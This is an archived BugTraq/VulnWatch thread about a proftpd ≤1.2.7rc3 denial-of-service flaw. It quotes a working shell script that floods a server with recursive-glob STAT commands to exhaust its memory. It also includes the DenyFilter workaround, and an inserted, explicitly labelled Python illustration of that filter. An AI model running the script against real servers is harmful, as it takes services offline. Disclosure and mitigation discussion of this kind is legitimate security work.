BugTraq
proftpd <=1.2.7rc3 DoS Dec 08 2002 12:53PM
Rob klein Gunnewiek (rmkleing hio hen nl) (1 replies)
Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Dec 10 2002 07:44PM
Kurt Seifried (listuser seifried org) (1 replies)
Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Dec 11 2002 12:15AM
Rob klein Gunnewiek (rmkleing hio hen nl) (1 replies)
Hello,

1. I know that the workaround with the DenyFilter works.
2. Proftpd by default doesn't have this filter set, nor does the
default proftpd install on Slackware 8.1.
3. The methods mentioned on the page you refer to do not work on later
proftpd versions (tested on 1.2.7rc3) because of limits set in the
code, i.e.:

ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
200 PORT command successful
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
226 Transfer complete.
ftp>

These proftpd versions don't even process that command.

I think I have done proper research on this issue before notifying anyone.

People should do more research before making any conclusions, it's far
less embarrassing.

Rob.

On Tue, 10 Dec 2002, Kurt Seifried wrote:

> This is so old I can't even find any postings/articles I remember making on
> it. Here is one link from early last year:
>
> http://lwn.net/2001/0322/a/proftpd-dos.php3
>
> Check the documentation:
>
> DenyFilter \*.*/
>
> Problem solved.
>
> People should search Google before posting, it's far less embarrassing.
>
> Kurt Seifried, kurt (at) seifried (dot) org [email concealed]
> A15B BEE5 B391 B9AD B0EF
> AEB0 AD63 0B4E AD56 E574
> http://seifried.org/security/
>
> ----- Original Message -----
> From: "Rob klein Gunnewiek" <rmkleing (at) hio.hen (dot) nl [email concealed]>
> To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <vulnwatch (at) vulnwatch (dot) org [email concealed]>
> Sent: Sunday, December 08, 2002 4:53 AM
> Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS
>
>
> > Hello,
> >
> > proftpd is vulnerable to denial of service similar to the list
> > */../*/../*/../*.
> >
> > #!/bin/sh
> > #
> > # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
> > # might work against many other FTP daemons
> > # consumes nearly all memory and a lot of CPU
> > #
> > # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
> > #
> > # 7-dec-02 - detach - www.duho.org
> > #
> > # use: ./prodos.sh <host> <user> <pass>
> > # do this some more to make sure the system eventually dies
> >
> > cnt=25
> > while [ $cnt -gt 0 ] ; do
> > ftp -n << EOF&
> > o $1
> > quote user $2
> > quote pass $3
> > quote stat /*/*/*/*/*/*/*
> > quit
> > EOF
> > let cnt=cnt-1
> > done
> > sleep 2
> > killall -9 ftp
> > echo DONE!
> >
> > #end
> >
>
>

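A defender's-eye illustration of what the DenyFilter workaround discussed in this thread does and does not catch, added here as an example; it is not code from the thread or from the ProFTPD project. ProFTPD's DenyFilter directive matches a regular expression against each command's arguments and refuses the command on a match; the pattern used below is the one Kurt quotes. Two assumptions: Python's `re` is treated as close enough to ProFTPD's POSIX regex for this simple expression, and the `wildcard_segments` counter is a hypothetical coarse complexity heuristic of my own, not the limit Rob mentions in the ProFTPD code.

```python
import re

# The DenyFilter pattern quoted in the thread: a literal '*' followed
# anywhere later by a '/'. Anything matching it is refused before the
# server ever tries to glob the path.
DENY_FILTER = r"\*.*/"


def denied_by_filter(argument: str, pattern: str = DENY_FILTER) -> bool:
    """Return True if DenyFilter would reject this command argument."""
    return re.search(pattern, argument) is not None


def wildcard_segments(argument: str) -> int:
    """Count path segments containing a glob metacharacter (hypothetical heuristic).

    Every wildcard segment multiplies the directory walks a naive glob has
    to perform, which is why /*/*/*/*/*/*/* is so expensive. A cap on this
    count is a coarse resource limit that is independent of the regex filter.
    """
    return sum(1 for seg in argument.split("/") if any(c in seg for c in "*?["))


def classify(command: str, max_wildcard_segments: int = 3) -> dict:
    """Split 'VERB argument' and report what each check says about it."""
    verb, _, argument = command.partition(" ")
    segments = wildcard_segments(argument)
    return {
        "verb": verb.upper(),
        "argument": argument,
        "denied_by_filter": denied_by_filter(argument),
        "wildcard_segments": segments,
        "over_limit": segments > max_wildcard_segments,
    }


# Constructed sample command lines in the shape of those shown in the thread.
SAMPLE_COMMANDS = [
    "stat /*/*/*/*/*/*/*",                    # the argument from the posted script
    "list .*./*?/.*./*?/.*./*?/.*./*?/.*./",  # the argument from the ls example
    "list pub/*.txt",                         # ordinary use, should be allowed
    "retr /pub/README",                       # no wildcards at all
    "list */",                                # harmless, but the regex refuses it
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(classify(cmd))
```

Running it shows the trade-off of a regex-only workaround: both pathological arguments from the thread are refused, `pub/*.txt` passes because no `/` follows the `*`, but a harmless `list */` is refused too. The segment counter flags the two expensive arguments and nothing else, which is the kind of limit that addresses the cost itself rather than one spelling of it.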
Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Dec 11 2002 01:56AM
Kurt Seifried (listuser seifried org)